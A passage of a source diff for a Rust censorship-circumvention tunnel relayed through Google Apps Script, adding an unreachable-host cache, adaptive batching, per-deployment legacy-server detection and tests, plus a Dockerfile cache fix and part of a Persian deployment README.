+ return; + } + let mut cache = match self.unreachable_cache.lock() { + Ok(g) => g, + Err(p) => p.into_inner(), + }; + // Cap enforcement is two-stage: first drop anything already expired, + // then if we're STILL at/above the cap (i.e. an unbounded burst of + // unique unreachable hosts within the TTL), evict the entry that + // would expire soonest. This bounds the map size at all times — a + // pure `retain` on expiry alone would let the map grow unbounded + // until the first entry's TTL elapses. + if cache.len() >= UNREACHABLE_CACHE_MAX { + let now = Instant::now(); + cache.retain(|_, expiry| *expiry > now); + while cache.len() >= UNREACHABLE_CACHE_MAX { + let victim = cache + .iter() + .min_by_key(|(_, expiry)| **expiry) + .map(|(k, _)| k.clone()); + match victim { + Some(k) => { + cache.remove(&k); + } + None => break, + } + } + } + let key = (normalize_cache_host(host), port); + cache.insert(key, Instant::now() + UNREACHABLE_CACHE_TTL); + tracing::debug!( + "negative-cached {}:{} for {:?} ({})", + host, + port, + UNREACHABLE_CACHE_TTL, + err + ); + } + fn record_preread_win(&self, port: u16, elapsed: Duration) { self.preread_win.fetch_add(1, Ordering::Relaxed); self.preread_win_total_us @@ -302,7 +556,9 @@ impl TunnelMux { } } -async fn mux_loop(mut rx: mpsc::Receiver, fronter: Arc) { +async fn mux_loop(mut rx: mpsc::Receiver, fronter: Arc, coalesce_step_ms: u64, coalesce_max_ms: u64) { + let coalesce_step = Duration::from_millis(coalesce_step_ms); + let coalesce_max = Duration::from_millis(coalesce_max_ms); // One semaphore per deployment ID, each allowing 30 concurrent requests. let sems: Arc>> = Arc::new( fronter @@ -319,19 +575,42 @@ async fn mux_loop(mut rx: mpsc::Receiver, fronter: Arc) { loop { let mut msgs = Vec::new(); - match tokio::time::timeout(Duration::from_millis(30), rx.recv()).await { - Ok(Some(msg)) => msgs.push(msg), - Ok(None) => break, - Err(_) => continue, + // Block on the first message — no point waking up to find an empty + // queue. Once the first op lands, the adaptive coalesce loop waits + // in `coalesce_step` increments (resetting on each new arrival, up + // to `coalesce_max`) so concurrent ops land in the same batch. + match rx.recv().await { + Some(msg) => msgs.push(msg), + None => break, } - while let Ok(msg) = rx.try_recv() { - msgs.push(msg); + let hard_deadline = tokio::time::Instant::now() + coalesce_max; + let mut soft_deadline = tokio::time::Instant::now() + coalesce_step; + loop { + // Drain anything that's already queued without waiting. + while let Ok(msg) = rx.try_recv() { + msgs.push(msg); + // Reset the soft deadline — more ops are arriving. + soft_deadline = tokio::time::Instant::now() + coalesce_step; + } + let now = tokio::time::Instant::now(); + let wait_until = soft_deadline.min(hard_deadline); + if now >= wait_until { + break; + } + match tokio::time::timeout(wait_until - now, rx.recv()).await { + Ok(Some(msg)) => { + msgs.push(msg); + // New op arrived — extend the soft deadline. + soft_deadline = tokio::time::Instant::now() + coalesce_step; + } + Ok(None) => return, + Err(_) => break, // soft or hard deadline hit, no more ops + } } // Split: plain connects go parallel, data-bearing ops get batched. let mut data_ops: Vec = Vec::new(); - let mut data_replies: Vec<(usize, oneshot::Sender>)> = - Vec::new(); + let mut data_replies: Vec<(usize, BatchedReply)> = Vec::new(); let mut close_sids: Vec = Vec::new(); let mut batch_payload_bytes: usize = 0; @@ -527,7 +806,7 @@ async fn fire_batch( sems: &Arc>>, fronter: &Arc, data_ops: Vec, - data_replies: Vec<(usize, oneshot::Sender>)>, + data_replies: Vec<(usize, BatchedReply)>, ) { let script_id = fronter.next_script_id(); let sem = sems @@ -542,10 +821,12 @@ async fn fire_batch( let t0 = std::time::Instant::now(); let n_ops = data_ops.len(); - // Bounded-wait: if the batch takes longer than BATCH_TIMEOUT, - // all sessions in this batch get an error and can retry. + // Bounded-wait: if the batch takes longer than the configured + // batch timeout (Config::request_timeout_secs), all sessions in + // this batch get an error and can retry. + let batch_timeout = f.batch_timeout(); let result = tokio::time::timeout( - BATCH_TIMEOUT, + batch_timeout, f.tunnel_batch_request_to(&script_id, &data_ops), ) .await; @@ -558,23 +839,111 @@ async fn fire_batch( match result { Ok(Ok(batch_resp)) => { + f.record_batch_success(&script_id); + // Wire the Full-mode usage counter that #230 / #362 flagged + // as stuck-at-zero. Each successful batch is one + // `UrlFetchApp.fetch()` call against the deploying Google + // account's daily quota — bytes-counted is the inbound JSON + // response which is the closest analogue to the apps_script + // path's `record_today(bytes_received)` (we don't have the + // exact response byte count post-deserialize, so we use a + // proxy: sum of per-session response payload bytes the + // batch carried back). Underestimates by JSON envelope + // overhead but is in the right order of magnitude. + let response_bytes: u64 = batch_resp + .r + .iter() + .map(|r| { + // `d` carries TCP payload (base64 string len ≈ + // 4/3 of decoded bytes; close enough); `pkts` + // carries UDP datagrams (each base64); plus any + // error string. Sum gives a stable proxy for + // "how much did this batch move." + let d = r.d.as_ref().map(|s| s.len() as u64).unwrap_or(0); + let pkts = r + .pkts + .as_ref() + .map(|v| v.iter().map(|p| p.len() as u64).sum::()) + .unwrap_or(0); + d + pkts + }) + .sum(); + f.record_today(response_bytes); + let sid_short = &script_id[..script_id.len().min(8)]; for (idx, reply) in data_replies { if let Some(resp) = batch_resp.r.get(idx) { - let _ = reply.send(Ok(resp.clone())); + let _ = reply.send(Ok((resp.clone(), script_id.clone()))); } else { - let _ = reply.send(Err("missing response in batch".into())); + let _ = reply.send(Err(format!( + "missing response in batch from script {}", + sid_short + ))); } } } Ok(Err(e)) => { + // Read-side timeout from `domain_fronter`: Apps Script didn't + // start streaming response bytes within the per-read deadline. + // Common cause: deployment's `TUNNEL_SERVER_URL` points at a + // dead host, so UrlFetchApp inside Apps Script hangs until its + // own internal connect timeout. Strike-counter blacklists the + // deployment after a sustained pattern. + if matches!(e, FronterError::Timeout) { + f.record_timeout_strike(&script_id); + } let err_msg = format!("{}", e); - tracing::warn!("batch failed: {}", err_msg); + let sid_short = &script_id[..script_id.len().min(8)]; + // Detect the body string we ship as the v1.8.0 bad-auth + // decoy. v1.8.1 asserted "AUTH_KEY mismatch" outright, but + // #404 (w0l4i) found the same body comes back from Apps + // Script in 3 other unrelated cases too: + // + // 1. AUTH_KEY mismatch — our intentional decoy + // 2. Apps Script execution timeout/ — runtime hit 6-min + // mid-call quota tear cap or per-100s quota + // 3. Apps Script internal hiccup — Google-side flake, + // serves placeholder + // 4. ISP-side response truncation — #313 pattern, the + // response was assembled + // but ate an RST mid-flight + // + // So we surface all four candidates instead of asserting #1. + // Users can flip DIAGNOSTIC_MODE=true in Code.gs to disambiguate: + // only #1 still returns the decoy in diagnostic mode; the + // others return real JSON or different errors. + if err_msg.contains("The script completed but did not return anything") { + tracing::error!( + "batch failed (script {}): got the v1.8.0 decoy/placeholder body — \ + could be (1) AUTH_KEY mismatch between mhrv-rs config and Code.gs \ + (run a direct curl probe against the deployment to verify), \ + (2) Apps Script execution timeout or per-100s quota tear (try \ + lowering parallel_concurrency in config), (3) Apps Script \ + internal hiccup (transient, retry next batch), or (4) ISP-side \ + response truncation (#313 pattern, try a different google_ip). \ + To distinguish (1) from the rest: set DIAGNOSTIC_MODE=true at \ + the top of Code.gs + redeploy as new version — only AUTH_KEY \ + mismatch returns this body in diagnostic mode.", + sid_short + ); + } else { + tracing::warn!("batch failed (script {}): {}", sid_short, err_msg); + } for (_, reply) in data_replies { let _ = reply.send(Err(err_msg.clone())); } } Err(_) => { - tracing::warn!("batch timed out after {:?} ({} ops)", BATCH_TIMEOUT, n_ops); + // Whole-batch budget elapsed. Even stronger signal than a + // per-read timeout — count it the same way so a truly-stuck + // deployment exits round-robin fast. + f.record_timeout_strike(&script_id); + let sid_short = &script_id[..script_id.len().min(8)]; + tracing::warn!( + "batch timed out after {:?} (script {}, {} ops)", + batch_timeout, + sid_short, + n_ops + ); for (_, reply) in data_replies { let _ = reply.send(Err("batch timed out".into())); } @@ -697,6 +1066,11 @@ async fn connect_plain(host: &str, port: u16, mux: &Arc) -> std::io:: Ok(Ok(resp)) => { if let Some(ref e) = resp.e { tracing::error!("tunnel connect error for {}:{}: {}", host, port, e); + // Only cache here: `resp.e` is the tunnel-node's own connect() + // result against the target. The outer `Ok(Err(_))` arm below + // is a transport-level failure (relay → Apps Script → tunnel- + // node never reached) and tells us nothing about the target. + mux.record_unreachable_if_match(host, port, e); return Err(std::io::Error::new( std::io::ErrorKind::ConnectionRefused, e.clone(), @@ -736,13 +1110,16 @@ async fn connect_with_initial_data( .await; let resp = match reply_rx.await { - Ok(Ok(resp)) => resp, + Ok(Ok((resp, _script_id))) => resp, Ok(Err(e)) => { if is_connect_data_unsupported_error_str(&e) { tracing::debug!("connect_data unsupported for {}:{}: {}", host, port, e); return Ok(ConnectDataOutcome::Unsupported); } tracing::error!("tunnel connect_data error for {}:{}: {}", host, port, e); + // Outer transport failure (relay/Apps Script never reached the + // tunnel-node). Don't poison the destination cache from here — + // see `connect_plain` for the same reasoning. return Err(std::io::Error::new( std::io::ErrorKind::ConnectionRefused, e, @@ -768,6 +1145,8 @@ async fn connect_with_initial_data( if let Some(ref e) = resp.e { tracing::error!("tunnel connect_data error for {}:{}: {}", host, port, e); + // `resp.e` is the tunnel-node's own connect result — cache it. + mux.record_unreachable_if_match(host, port, e); return Err(std::io::Error::new( std::io::ErrorKind::ConnectionRefused, e.clone(), @@ -834,18 +1213,30 @@ async fn tunnel_loop( // drains. With long-poll, the server holds empty polls open up // to its `LONGPOLL_DEADLINE` (~5 s currently), so the client // can keep this read timeout short — the wait is on the wire, - // not here. Against a *legacy* tunnel-node (no long-poll, fast + // not here. Against *legacy* tunnel-nodes (no long-poll, fast // empty replies), the same short cadence + always-poll behavior // would generate continuous round-trips on idle sessions and - // burn Apps Script quota. The `server_no_longpoll` flag detects - // the legacy case from reply latency below and reverts to the - // pre-long-poll cadence: long sleep on local read, skip empty - // polls when sustained-idle. - let legacy_mode = mux.server_no_longpoll(); + // burn Apps Script quota. + // + // Both the read timeout and the skip-empty-when-idle decision + // are gated on `all_legacy` — i.e. *every known deployment is + // currently legacy*. Per-deployment "skip when this script is + // legacy" sounds appealing but is unsafe: the next op's + // deployment is chosen by `next_script_id()` only when the + // batch fires, so the loop can't predict where the empty poll + // will land. Suppressing polls based on the *previous* reply's + // script would stall remote→client data on mixed setups — + // round-robin would never reach the long-poll-capable peer for + // this session if every iteration short-circuits before + // sending. Cost of the conservative gate: legacy peers see + // some wasted empty polls when at least one peer is healthy, + // bounded by round-robin fan-out. Worth it to keep pushed + // bytes flowing. + let all_legacy = mux.all_servers_legacy(); let client_data = if let Some(data) = pending_client_data.take() { Some(data) } else { - let read_timeout = match (legacy_mode, consecutive_empty) { + let read_timeout = match (all_legacy, consecutive_empty) { (_, 0) => Duration::from_millis(20), (_, 1) => Duration::from_millis(80), (_, 2) => Duration::from_millis(200), @@ -864,13 +1255,13 @@ async fn tunnel_loop( } }; - // Legacy-server skip: against a non-long-polling tunnel-node, - // an empty poll is wasted work — fast-empty reply, no push - // delivery benefit. Preserve the pre-long-poll behavior of - // going quiet after a few empties. Long-poll-capable servers - // skip this branch and always send the empty op so the server - // can hold it open. - if legacy_mode && client_data.is_none() && consecutive_empty > 3 { + // Skip empty polls only when *every* deployment is legacy. With + // even one long-poll-capable peer, round-robin will land some + // empty polls there where the server holds them open and can + // deliver pushed bytes — that's the whole point of long-poll, + // so we must keep emitting. See the `all_legacy` comment above + // for why a per-deployment gate here would stall mixed setups. + if all_legacy && client_data.is_none() && consecutive_empty > 3 { continue; } @@ -889,8 +1280,8 @@ async fn tunnel_loop( // Bounded-wait on reply: if the batch this op landed in is slow // (dead target on the tunnel-node side), don't block this session // forever — timeout and let it retry on the next tick. - let resp = match tokio::time::timeout(REPLY_TIMEOUT, reply_rx).await { - Ok(Ok(Ok(r))) => r, + let (resp, script_id) = match tokio::time::timeout(REPLY_TIMEOUT, reply_rx).await { + Ok(Ok(Ok((r, sid_used)))) => (r, sid_used), Ok(Ok(Err(e))) => { tracing::debug!("tunnel data error: {}", e); break; @@ -903,18 +1294,18 @@ async fn tunnel_loop( } }; - // Legacy-server detection: an empty-in/empty-out round trip - // that finishes well under `LEGACY_DETECT_THRESHOLD` is + // Per-deployment legacy detection: an empty-in/empty-out round + // trip that finishes well under `LEGACY_DETECT_THRESHOLD` is // structurally impossible on a long-poll-capable tunnel-node // (the server holds the response either until data arrives or - // until its long-poll deadline). One observation flips the - // sticky flag for the rest of this process. Skip the check - // once already in legacy mode — the comparison is cheap, but - // calling `mark_server_no_longpoll` repeatedly muddies logs. - if !legacy_mode && was_empty_poll { + // until its long-poll deadline). One observation marks *this + // specific* deployment as legacy for `LEGACY_RECOVER_AFTER`; + // peers stay on the fast path. The aggregate `all_legacy` gate + // only flips once *every* deployment has been so marked. + if was_empty_poll { let reply_was_empty = resp.d.as_deref().map(str::is_empty).unwrap_or(true); if reply_was_empty && send_at.elapsed() < LEGACY_DETECT_THRESHOLD { - mux.mark_server_no_longpoll(); + mux.mark_server_no_longpoll(&script_id); } } @@ -1069,6 +1460,133 @@ mod tests { ))); } + #[test] + fn unreachable_error_str_matches_expected_variants() { + assert!(is_unreachable_error_str( + "connect failed: Network is unreachable (os error 101)" + )); + assert!(is_unreachable_error_str("No route to host")); + assert!(is_unreachable_error_str("os error 113")); + // Case-insensitive. + assert!(is_unreachable_error_str( + "CONNECT FAILED: NETWORK IS UNREACHABLE" + )); + } + + #[test] + fn unreachable_error_str_rejects_unrelated() { + assert!(!is_unreachable_error_str("connection refused")); + assert!(!is_unreachable_error_str("connect timed out")); + assert!(!is_unreachable_error_str("connection reset by peer")); + assert!(!is_unreachable_error_str("")); + } + + #[test] + fn negative_cache_records_and_short_circuits() { + let (mux, _rx) = mux_for_test(); + // Initially nothing is cached. + assert!(!mux.is_unreachable("ds6.probe.example", 443)); + // Record a matching error. + mux.record_unreachable_if_match( + "ds6.probe.example", + 443, + "connect failed: Network is unreachable (os error 101)", + ); + assert!(mux.is_unreachable("ds6.probe.example", 443)); + // A different port for the same host is its own entry. + assert!(!mux.is_unreachable("ds6.probe.example", 80)); + } + + #[test] + fn negative_cache_ignores_non_unreachable_errors() { + let (mux, _rx) = mux_for_test(); + mux.record_unreachable_if_match( + "example.com", + 443, + "connect failed: connection refused", + ); + assert!(!mux.is_unreachable("example.com", 443)); + } + + #[test] + fn negative_cache_normalizes_host_keys() { + let (mux, _rx) = mux_for_test(); + // Cache under one casing/format... + mux.record_unreachable_if_match( + "Example.COM.", + 443, + "Network is unreachable (os error 101)", + ); + // ...and look up under several equivalent forms. + assert!(mux.is_unreachable("example.com", 443)); + assert!(mux.is_unreachable("EXAMPLE.com", 443)); + assert!(mux.is_unreachable("example.com.", 443)); + // Different host should still miss. + assert!(!mux.is_unreachable("other.com", 443)); + } + + /// Outer `Ok(Err(_))` from the mux channel means "the relay never + /// reached the tunnel-node" (HTTP/TLS to Apps Script failed, batch + /// timed out, etc.) — the destination wasn't even attempted. Even if + /// that error string contains "Network is unreachable" (e.g. the + /// client device's WAN was momentarily down), it must NOT poison the + /// destination cache, or every host the user touched during a + /// connectivity blip stays refused for 30s. + #[tokio::test] + async fn negative_cache_skips_outer_relay_errors() { + let (mux, mut rx) = mux_for_test(); + let mux_for_task = mux.clone(); + let task = tokio::spawn(async move { + connect_plain("real.target.example", 443, &mux_for_task).await + }); + + // Receive the Connect msg and reply with an outer Err whose string + // would otherwise match `is_unreachable_error_str`. + let msg = rx.recv().await.expect("connect msg"); + let reply = match msg { + MuxMsg::Connect { reply, .. } => reply, + other => panic!("expected Connect, got {:?}", std::mem::discriminant(&other)), + }; + let _ = reply.send(Err( + "relay failed: Network is unreachable (os error 101)".into(), + )); + + let res = task.await.expect("task"); + assert!(res.is_err(), "connect_plain should surface the error"); + assert!( + !mux.is_unreachable("real.target.example", 443), + "outer relay error must not negative-cache the destination" + ); + } + + #[test] + fn negative_cache_enforces_hard_cap_under_unique_burst() { + let (mux, _rx) = mux_for_test(); + // Insert enough unique still-live entries to exceed the cap. The + // map size must never exceed UNREACHABLE_CACHE_MAX, even though + // every entry is fresh and `retain(expired)` prunes nothing. + let burst = UNREACHABLE_CACHE_MAX + 50; + for i in 0..burst { + let host = format!("h{}.example", i); + mux.record_unreachable_if_match( + &host, + 443, + "connect failed: Network is unreachable (os error 101)", + ); + } + let len = mux + .unreachable_cache + .lock() + .map(|g| g.len()) + .unwrap_or(0); + assert!( + len <= UNREACHABLE_CACHE_MAX, + "cache size {} exceeded cap {}", + len, + UNREACHABLE_CACHE_MAX + ); + } + #[test] fn server_speaks_first_covers_common_protocols() { for p in [21u16, 22, 25, 80, 110, 143, 587] { @@ -1091,17 +1609,28 @@ mod tests { /// than wired to a real DomainFronter. Lets tests assert what messages /// the client would emit without needing network or apps_script. fn mux_for_test() -> (Arc, mpsc::Receiver) { + mux_for_test_with(2) + } + + /// Build a TunnelMux for tests with a specific deployment count. The + /// per-deployment legacy state's aggregate gate (`all_servers_legacy`) + /// requires `legacy_deployments.len() == num_scripts`, so tests that + /// exercise that gate need to control how many "deployments" exist. + fn mux_for_test_with(num_scripts: usize) -> (Arc, mpsc::Receiver) { let (tx, rx) = mpsc::channel(16); let mux = Arc::new(TunnelMux { tx, connect_data_unsupported: Arc::new(AtomicBool::new(false)), - server_no_longpoll: Arc::new(AtomicBool::new(false)), + legacy_deployments: Mutex::new(HashMap::new()), + all_legacy: Arc::new(AtomicBool::new(false)), + num_scripts, preread_win: AtomicU64::new(0), preread_loss: AtomicU64::new(0), preread_skip_port: AtomicU64::new(0), preread_skip_unsupported: AtomicU64::new(0), preread_win_total_us: AtomicU64::new(0), preread_total_events: AtomicU64::new(0), + unreachable_cache: Mutex::new(HashMap::new()), }); (mux, rx) } @@ -1144,14 +1673,17 @@ mod tests { assert_eq!(sid, "sid-under-test"); assert_eq!(&data[..], b"CLIENTHELLO"); // Reply with eof so tunnel_loop unwinds cleanly. - let _ = reply.send(Ok(TunnelResponse { - sid: Some("sid-under-test".into()), - d: None, - pkts: None, - eof: Some(true), - e: None, - code: None, - })); + let _ = reply.send(Ok(( + TunnelResponse { + sid: Some("sid-under-test".into()), + d: None, + pkts: None, + eof: Some(true), + e: None, + code: None, + }, + "test-script".to_string(), + ))); } other => panic!( "first mux message was not Data (expected replay); got {:?}", @@ -1171,6 +1703,81 @@ mod tests { .expect("tunnel_loop did not exit after eof"); } + /// Regression for the mixed-mode stall: A is legacy, B is long-poll + /// capable, the session's last reply came from A. A naive per- + /// deployment skip (gated on the *previous* reply's `script_id`) + /// would short-circuit every empty poll on this session — so B + /// never gets a chance to long-poll for us, and remote→client data + /// stalls until either the local client sends bytes or A's TTL + /// expires. The fix gates skip-when-idle on the aggregate + /// `all_servers_legacy()` instead, so the loop keeps emitting empty + /// polls whenever at least one peer can still hold the request open. + /// Replies are paced via `start_paused` time auto-advance — without + /// it the test would take ~2 s of real wall-clock time per session. + #[tokio::test(start_paused = true)] + async fn tunnel_loop_keeps_polling_when_only_some_deployments_legacy() { + use tokio::net::TcpListener; + + let listener = TcpListener::bind(("127.0.0.1", 0)).await.unwrap(); + let addr = listener.local_addr().unwrap(); + let accept = tokio::spawn(async move { listener.accept().await.unwrap().0 }); + let _client = TcpStream::connect(addr).await.unwrap(); + let mut server_side = accept.await.unwrap(); + + // 2 deployments, only A marked legacy → all_servers_legacy = false. + let (mux, mut rx) = mux_for_test_with(2); + mux.mark_server_no_longpoll("script-A"); + assert!(!mux.all_servers_legacy()); + + let loop_handle = tokio::spawn({ + let mux = mux.clone(); + async move { tunnel_loop(&mut server_side, "sid-mixed", &mux, None).await } + }); + + // Reply to 6 empty polls, all from A. With the regression + // (per-deployment skip on `last_script_id == A`), the loop would + // stop emitting at iteration 4 — `consecutive_empty > 3` plus + // `last_was_legacy` would short-circuit the send. With the fix, + // the aggregate gate stays false and the loop keeps polling. + // The 60 s timeout below is paused-time, so it only "elapses" + // if rx.recv() truly never resolves (i.e. the loop has stalled). + for i in 0..6u32 { + let msg = tokio::time::timeout(Duration::from_secs(60), rx.recv()) + .await + .unwrap_or_else(|_| panic!( + "loop stopped emitting at iteration {} — regression: per-deployment skip-when-idle stalled session even though long-poll-capable peer was available", + i + )) + .expect("mux channel closed unexpectedly"); + match msg { + MuxMsg::Data { sid, data, reply } => { + assert_eq!(sid, "sid-mixed"); + assert!(data.is_empty(), "expected empty poll, got {} bytes", data.len()); + let last = i == 5; + let _ = reply.send(Ok(( + TunnelResponse { + sid: Some("sid-mixed".into()), + d: None, + pkts: None, + eof: if last { Some(true) } else { None }, + e: None, + code: None, + }, + "script-A".to_string(), + ))); + } + _ => panic!( + "iteration {}: expected Data poll, got a different MuxMsg variant", + i + ), + } + } + + let _ = tokio::time::timeout(Duration::from_secs(2), loop_handle) + .await + .expect("tunnel_loop did not exit after eof"); + } + /// Once `mark_connect_data_unsupported` is called, future sessions /// must see the flag — no per-session repeat of the detect-and-fallback /// cost. If this regresses, every new flow pays an extra round trip @@ -1185,19 +1792,109 @@ mod tests { assert!(mux.connect_data_unsupported()); } - /// `server_no_longpoll` must be sticky too: once we see a legacy - /// fast-empty reply, every subsequent session uses the legacy idle - /// cadence (long read timeout + skip-empty) for the rest of the - /// process. Flipping it back per-session would either thrash the - /// cadence or double the detection cost. + /// Marking deployment A as legacy must NOT make B look legacy. This + /// is the central guarantee of the per-deployment design: with the + /// old global AtomicBool, one slow / legacy deployment dragged every + /// session onto the 30 s legacy cadence even when the other 7 were + /// long-polling fine. #[test] - fn no_longpoll_cache_is_sticky() { - let (mux, _rx) = mux_for_test(); - assert!(!mux.server_no_longpoll()); - mux.mark_server_no_longpoll(); - assert!(mux.server_no_longpoll()); - mux.mark_server_no_longpoll(); // idempotent - assert!(mux.server_no_longpoll()); + fn legacy_state_is_per_deployment() { + let (mux, _rx) = mux_for_test_with(2); + mux.mark_server_no_longpoll("script-A"); + + let deps = mux.legacy_deployments.lock().unwrap(); + assert!(deps.contains_key("script-A")); + assert!( + !deps.contains_key("script-B"), + "marking A must not insert an entry for B" + ); + } + + /// `all_servers_legacy` (the per-session 30 s read-timeout gate) flips + /// to true *only* when every known deployment has been marked. With + /// 2 deployments, marking one keeps the gate false; marking both + /// flips it true. + #[test] + fn all_servers_legacy_requires_every_deployment() { + let (mux, _rx) = mux_for_test_with(2); + assert!(!mux.all_servers_legacy()); + + mux.mark_server_no_longpoll("script-A"); + assert!( + !mux.all_servers_legacy(), + "1 of 2 marked: aggregate must stay false" + ); + + mux.mark_server_no_longpoll("script-B"); + assert!( + mux.all_servers_legacy(), + "all deployments marked: aggregate flips true" + ); + + // Idempotent re-mark of an already-legacy deployment doesn't + // disturb the aggregate. + mux.mark_server_no_longpoll("script-A"); + assert!(mux.all_servers_legacy()); + } + + /// After `LEGACY_RECOVER_AFTER`, an entry is treated as expired and + /// the deployment rejoins the long-poll fast path. The next mark + /// (against any deployment) sweeps stale entries before recomputing + /// the aggregate gate, so a recovered peer doesn't keep counting + /// toward `all_legacy`. Backdating the mark time avoids a real 60 s + /// sleep in the test — same effect as the wall-clock moving forward. + #[test] + fn legacy_state_recovers_after_ttl() { + let (mux, _rx) = mux_for_test_with(2); + mux.mark_server_no_longpoll("script-A"); + + // Backdate A past LEGACY_RECOVER_AFTER, then mark B. B's mark + // must trigger a sweep that drops the stale A entry. + { + let mut deps = mux.legacy_deployments.lock().unwrap(); + let stale = Instant::now() + .checked_sub(LEGACY_RECOVER_AFTER + Duration::from_secs(1)) + .expect("test environment should have a non-trivial monotonic clock"); + deps.insert("script-A".to_string(), stale); + } + mux.mark_server_no_longpoll("script-B"); + + let deps = mux.legacy_deployments.lock().unwrap(); + assert!( + !deps.contains_key("script-A"), + "expired entry must be swept on the next mark — otherwise stale legacy state never clears" + ); + assert!(deps.contains_key("script-B")); + } + + /// If every deployment is legacy and then time passes past + /// `LEGACY_RECOVER_AFTER` *without any new mark*, the aggregate gate + /// must self-correct on the next `all_servers_legacy()` call. + /// Without the in-place sweep on read, stale legacy marks would keep + /// the 30 s read-timeout active forever after every deployment + /// recovers. + #[test] + fn all_servers_legacy_self_corrects_when_entries_expire() { + let (mux, _rx) = mux_for_test_with(2); + mux.mark_server_no_longpoll("script-A"); + mux.mark_server_no_longpoll("script-B"); + assert!(mux.all_servers_legacy()); + + // Backdate every entry past TTL. + { + let mut deps = mux.legacy_deployments.lock().unwrap(); + let stale = Instant::now() + .checked_sub(LEGACY_RECOVER_AFTER + Duration::from_secs(1)) + .expect("monotonic clock should be far enough along"); + for (_, t) in deps.iter_mut() { + *t = stale; + } + } + + assert!( + !mux.all_servers_legacy(), + "aggregate must self-correct when all entries expire — otherwise the 30 s read timeout sticks forever" + ); } #[test] diff --git a/tunnel-node/Dockerfile b/tunnel-node/Dockerfile index a31f31e8..801a0ac9 100644 --- a/tunnel-node/Dockerfile +++ b/tunnel-node/Dockerfile @@ -35,9 +35,21 @@ COPY src/ ./src/ # BuildKit cache mounts: cargo's registry/git caches and the target/ # directory persist across builds, dramatically speeding up rebuilds when # only application code changes. -RUN --mount=type=cache,target=/usr/local/cargo/registry \ - --mount=type=cache,target=/usr/local/cargo/git \ - --mount=type=cache,target=/app/target \ +# +# `id=...-$TARGETPLATFORM` is load-bearing on multi-arch builds. Without +# it, BuildKit defaults to a single shared cache across architectures +# and the `linux/amd64` + `linux/arm64` jobs race on the same on-disk +# `/usr/local/cargo/registry/src/...//.cargo-ok` extraction. The +# second-arriving arch hits `File exists (os error 17)` mid-unpack and +# the whole multi-arch build fails. Per-platform cache id keeps each +# arch's cache isolated; warm-build speedup is preserved per-arch. +# `target` cache is also platform-scoped because target/ holds object +# files for one ABI and sharing them across arches would just produce +# misses or, worse, invalid linking. +ARG TARGETPLATFORM +RUN --mount=type=cache,target=/usr/local/cargo/registry,id=cargo-registry-${TARGETPLATFORM} \ + --mount=type=cache,target=/usr/local/cargo/git,id=cargo-git-${TARGETPLATFORM} \ + --mount=type=cache,target=/app/target,id=app-target-${TARGETPLATFORM} \ cargo build --release --bin tunnel-node && \ cp /app/target/release/tunnel-node /usr/local/bin/tunnel-node diff --git a/tunnel-node/README.fa.md b/tunnel-node/README.fa.md new file mode 100644 index 00000000..007f7174 --- /dev/null +++ b/tunnel-node/README.fa.md @@ -0,0 +1,188 @@ +# Tunnel Node — راهنمای فارسی + +> *English: [README.md](./README.md)* + +سرور پل HTTP-tunnel برای حالت `full` در MasterHttpRelayVPN. درخواست‌های HTTP-tunnel رو که از Apps Script می‌رسن، به اتصال‌های واقعی TCP/UDP تبدیل می‌کنه. + +این `tunnel-node` همون قطعه‌ای از مسیر Full mode هست که روی **VPS شما** اجرا می‌شه. جواب کوتاه به سؤال «آیا VPS لازمه؟» = **بله، برای حالت Full بدون VPS کار نمی‌کنه**. + +## معماری + +``` +موبایل/PC → mhrv-rs → [TLS با domain-fronting روی Google] → Apps Script → [HTTP] → Tunnel Node (روی VPS شما) → [TCP/UDP واقعی] → اینترنت +``` + +Tunnel-node session‌های پایدار TCP و UDP رو نگه می‌داره. session‌های TCP اتصال‌های واقعی به سرور مقصد هستن؛ session‌های UDP، socketهای connected-UDP به یک `host:port` مقصد هستن. data از طریق پروتکل JSON جریان داره: + +- **connect** — باز کردن TCP به `host:port` + برگرداندن session ID +- **data** — نوشتن data کلاینت + خوندن جواب سرور +- **udp_open** — باز کردن UDP به `host:port`، اختیاری اولین datagram رو همزمان می‌فرسته +- **udp_data** — یک datagram UDP می‌فرسته، یا اگه `d` ست نشه برای datagram‌های برگشتی poll می‌کنه +- **close** — تخریب session +- **batch** — پردازش چند op در یک request HTTP (تعداد روند-تریپ کمتر) + +## استقرار + +### Cloud Run (پیشنهاد برای کاربران ایرانی متأثر از فیلتر #313) + +اجرای tunnel-node روی **Google Cloud Run** یعنی destination IP خود Google هست — احتمال filter شدن مسیر Apps Script → tunnel-node توسط ISP ایران بسیار پایین‌تر از Hetzner/DigitalOcean. ([کانتکست در #313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313)) + +```bash +cd tunnel-node +gcloud run deploy tunnel-node \ + --source . \ + --region us-central1 \ + --allow-unauthenticated \ + --set-env-vars TUNNEL_AUTH_KEY=$(openssl rand -hex 24) \ + --memory 256Mi \ + --cpu 1 \ + --max-instances 1 +``` + +### Docker — image آماده (هر VPS) + +سریع‌ترین مسیر. image آماده pull کن و اجرا کن؛ نیاز به Rust toolchain روی VPS نیست. + +```bash +# secret قوی بساز. ذخیره‌اش کن — همین مقدار رو بعداً تو CodeFull.gs paste می‌کنی. +SECRET=$(openssl rand -hex 24) +echo "TUNNEL_AUTH_KEY شما: $SECRET" + +# Pull + run. +docker run -d \ + --name mhrv-tunnel \ + --restart unless-stopped \ + -p 8080:8080 \ + -e TUNNEL_AUTH_KEY="$SECRET" \ + ghcr.io/therealaleph/mhrv-tunnel-node:latest +``` + +تگ `:latest` آخرین release رو دنبال می‌کنه. برای production توصیه می‌شه روی version مشخص pin بزنی: `ghcr.io/therealaleph/mhrv-tunnel-node:v1.8.0` (یا هر نسخه‌ای که داری). image روی `linux/amd64` و `linux/arm64` موجوده. + +**docker-compose.yml** اگه این رو ترجیح می‌دی: + +```yaml +services: + tunnel: + image: ghcr.io/therealaleph/mhrv-tunnel-node:latest + restart: unless-stopped + ports: + - "8080:8080" + environment: + TUNNEL_AUTH_KEY: ${TUNNEL_AUTH_KEY} +``` + +سپس `TUNNEL_AUTH_KEY=your-secret docker compose up -d`. + +### Docker — build از source + +اگه می‌خوای خودت image رو build کنی (یا custom تغییر بدی): + +```bash +cd tunnel-node +docker build -t tunnel-node . +docker run -p 8080:8080 -e TUNNEL_AUTH_KEY=your-secret tunnel-node +``` + +### Binary مستقیم + +```bash +cd tunnel-node +cargo build --release +TUNNEL_AUTH_KEY=your-secret PORT=8080 ./target/release/tunnel-node +``` + +## متغیرهای محیطی + +| متغیر | الزامی | پیش‌فرض | توضیح | +|-------|--------|---------|-------| +| `TUNNEL_AUTH_KEY` | بله | 